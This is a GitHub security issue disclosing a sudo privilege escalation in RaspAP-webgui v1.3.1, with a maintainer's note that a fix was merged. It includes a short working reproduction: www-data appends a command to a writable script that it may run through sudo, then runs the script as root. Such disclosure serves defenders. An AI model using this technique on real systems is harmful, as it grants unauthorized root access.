Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Security] Sudo Privilege Escalation #225

Closed
ghost opened this issue Aug 27, 2018 · 1 comment
Closed

[Security] Sudo Privilege Escalation #225

ghost opened this issue Aug 27, 2018 · 1 comment

Comments

@ghost
Copy link

ghost commented Aug 27, 2018

Subject of the issue

The www-data user, can escalate his privilege to root in RaspAP-webgui v1.3.1 using sudo, because of wrong rights on /etc/raspap/hostapd/enablelog.sh and /etc/raspap/hostapd/disablelog.sh.

Steps to reproduce

$ sudo -l
	Matching Defaults entries for www-data on raspberrypi:
	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
	User www-data may run the following commands on raspberrypi:
    		(ALL) NOPASSWD:/sbin/ifdown wlan0
		(ALL) NOPASSWD:/sbin/ifup wlan0
		(ALL) NOPASSWD:/bin/cat /etc/wpa_supplicant/wpa_supplicant.conf
		(ALL) NOPASSWD:/bin/cp /tmp/wifidata /etc/wpa_supplicant/wpa_supplicant.conf
		(ALL) NOPASSWD:/sbin/wpa_cli scan_results
		(ALL) NOPASSWD:/sbin/wpa_cli scan
		(ALL) NOPASSWD:/sbin/wpa_cli reconfigure
		(ALL) NOPASSWD:/bin/cp /tmp/hostapddata /etc/hostapd/hostapd.conf
		(ALL) NOPASSWD:/etc/init.d/hostapd start
		(ALL) NOPASSWD:/etc/init.d/hostapd stop
		(ALL) NOPASSWD:/etc/init.d/dnsmasq start
		(ALL) NOPASSWD:/etc/init.d/dnsmasq stop
		(ALL) NOPASSWD:/bin/cp /tmp/dhcpddata /etc/dnsmasq.conf
		(ALL) NOPASSWD:/sbin/shutdown -h now
		(ALL) NOPASSWD:/sbin/reboot
		(ALL) NOPASSWD:/sbin/ip link set wlan0 down
		(ALL) NOPASSWD:/sbin/ip link set wlan0 up
		(ALL) NOPASSWD:/sbin/ip -s a f label wlan0
		(ALL) NOPASSWD:/bin/cp /etc/raspap/networking/dhcpcd.conf /etc/dhcpcd.conf
		(ALL) NOPASSWD:/etc/raspap/hostapd/enablelog.sh
		(ALL) NOPASSWD:/etc/raspap/hostapd/disablelog.sh
$ ls -l /etc/raspap/hostapd
	-rwxr-xr-x 1 www-data www-data 102 Jan 1 2018 disablelog.sh
	-rwxr-xr-x 1 www-data www-data 101 Jan 1 2018 enablelog.sh

www-data has the right to modify disablelog.sh and enablelog.sh, so he can escalate to root using sudo.

$ id
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ echo "id" >> /etc/raspap/hostapd/enablelog.sh
$ sudo /etc/raspap/hostapd/enablelog.sh
	uid=0(root) gid=0(root) groups=0(root)

Expected behaviour

disablelog.sh and enablelog.sh must not be editable by www-data.
D9ping added a commit to D9ping/raspap-webgui that referenced this issue Aug 27, 2018
@D9ping
Fix for RaspAP#225, (Credits to DrStacheWH)
e428271 
Removed duplicated create_logging_scripts function.

Signed-off-by: D9ping <D9ping@users.noreply.github.com>
@billz billz mentioned this issue Sep 6, 2018
Merged
@billz
Copy link
Member

billz commented Sep 6, 2018

Fixed by @D9ping. Thanks

@billz billz closed this as completed Sep 6, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@billz